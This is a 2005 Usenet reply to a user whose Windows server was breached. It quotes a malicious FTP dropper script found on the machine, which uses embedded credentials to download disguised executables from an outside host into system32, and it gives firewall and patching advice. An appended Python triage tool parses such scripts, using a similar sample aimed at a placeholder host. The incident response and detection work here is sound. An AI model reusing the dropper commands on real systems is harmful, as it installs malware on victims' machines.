Re: Security Breach

From: Mark (nothere_at_notthere.com)
Date: 06/30/05

Date: 29 Jun 2005 22:49:02 -0500

"quest" <tobiquest@hotmail.com> wrote in message
news:1120010819.796186.225260@z14g2000cwz.googlegroups.com...
> I am running Windows 2k Advanced Server, running IIS, ColdFusion, SQL
> Server 2k, ZoneAlarm, a Netopia Cayman 5300 series router and
> remote admin. I just noticed a file C:\MSSQL_Script.txt which is
> requesting FTP access to download some malicious file. My questions:
>
> I rebuilt my PC from a backup but the file just re-appeared again.
> 1) Does anyone know how they might have gotten in? I only have ports
> 80, 443, 20, 21 opened.
> 2) How do hackers schedule jobs? 'Cos I did notice a recp.exe program
> requesting access also.
> 3) Can someone help with the next steps I need to take?
>
> Thanks
>
> content of file
>
> open ftp.cybton.com
> USER mkeoma uvrlSN
> USER mkeoma uvrlSN
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
> open ftp.cybton.com
> USER eazy VEDgFT
> binary
> get /mowl/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
> get /mowl/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
> get /mowl/net.exe C:\winnt\system32\driver\net.exe
> get /mowl/notepadc.xcl C:\winnt\system32\driver\notepadc.xcl
> quit
>

I couldn't see exact specifications, but that router doesn't look to be much
of a firewall, probably only SPI, and ZoneAlarm is a software-based SPI
firewall with its own limitations. So you need to make sure either all
applications facing the internet (i.e. those on ports 80, 443, 20, and 21) are
fully patched, or you need to look at a firewall with Intrusion Detection
capabilities (i.e. Netscreen/Sonicwall/Fortinet).
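The file quoted in the original post is a script in the format consumed by the Windows `ftp -s:` option: `open` a host, `USER name password` on one line, switch to `binary`, `get` each file to a local path, `quit`. Droppers of this kind are easy to triage mechanically. The following Python is an added example for this thread, not code from either poster: it parses that script format and flags downloads aimed at a system directory, executable payloads, and local file names that reuse a genuine Windows binary name (the quoted script writes a `net.exe` under `system32\driver`). The sample script is constructed with placeholder host and credentials, and the directory, extension and binary-name lists are this example's own choices, not anything the thread specifies.

```python
"""Triage a Windows ``ftp -s:`` style script of the kind quoted in the thread."""
from dataclasses import dataclass, field
from typing import List, Tuple

# Directories where a dropper plants files to blend in with the OS (example's own list).
SYSTEM_DIRS = (r"c:\winnt\system32", r"c:\windows\system32")
# Extensions Windows will execute directly (example's own list).
EXEC_EXTS = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".vbs")
# Genuine Windows binary names malware likes to reuse; net.exe appears in the thread.
SYSTEM_BINARY_NAMES = ("net.exe", "cmd.exe", "ftp.exe")

# Constructed sample mirroring the quoted script's shape; host and credentials are placeholders.
SAMPLE_SCRIPT = r"""
open ftp.example.invalid
USER alice hunter2
binary
get /drop/MSIntskmngr.exe C:\winnt\system32\driver\MSIntskmngr.exe
get /drop/mspaintfixd.tmp C:\winnt\system32\driver\mspaintfixd.tmp
get /drop/net.exe C:\winnt\system32\driver\net.exe
get /drop/readme.txt C:\temp\readme.txt
quit
"""


@dataclass
class FtpScriptReport:
    hosts: List[str] = field(default_factory=list)
    credentials: List[Tuple[str, str]] = field(default_factory=list)  # (user, password)
    downloads: List[Tuple[str, str]] = field(default_factory=list)    # (remote, local)
    findings: List[str] = field(default_factory=list)

    def is_suspicious(self) -> bool:
        # Embedded credentials alone are normal for ftp -s: scripts; only
        # the download-related findings decide.
        return bool(self.findings)


def parse_ftp_script(text: str) -> FtpScriptReport:
    """Extract hosts, one-line USER credentials and get targets from an ftp script."""
    report = FtpScriptReport()
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            report.hosts.append(args[0])
        elif cmd == "user" and args:
            # Scripted ftp.exe accepts "USER name password" on a single line.
            report.credentials.append((args[0], args[1] if len(args) > 1 else ""))
        elif cmd in ("get", "mget") and args:
            remote = args[0]
            # Without an explicit local path ftp.exe keeps the remote base name.
            local = args[1] if len(args) > 1 else remote.rsplit("/", 1)[-1]
            report.downloads.append((remote, local))
    return report


def triage_ftp_script(text: str) -> FtpScriptReport:
    """Parse the script and attach dropper indicators for each download."""
    report = parse_ftp_script(text)
    for remote, local in report.downloads:
        low = local.lower()
        name = low.replace("/", "\\").rsplit("\\", 1)[-1]
        if low.startswith(SYSTEM_DIRS):
            report.findings.append(f"download into a system directory: {local}")
        if name.endswith(EXEC_EXTS):
            report.findings.append(f"executable payload fetched: {remote} -> {local}")
        if name in SYSTEM_BINARY_NAMES:
            report.findings.append(f"local file name reuses a Windows system binary name: {local}")
    return report


if __name__ == "__main__":
    r = triage_ftp_script(SAMPLE_SCRIPT)
    print("hosts:", r.hosts)
    print("credentials found:", len(r.credentials))
    for f in r.findings:
        print("FINDING:", f)
    print("suspicious:", r.is_suspicious())
```

Run against the constructed sample, the report lists one host, one credential pair and four downloads, and produces six findings: three writes under `C:\winnt\system32`, two executable payloads, and the `net.exe` name reuse. A script that only fetches a text file into a scratch directory produces no findings, so `is_suspicious()` is false for it even though it too embeds a password. The same logic fits a scheduled check over a server's drive for any `*.txt` that parses as an ftp script with findings, which is how a file like the poster's `MSSQL_Script.txt` would be caught on reappearance.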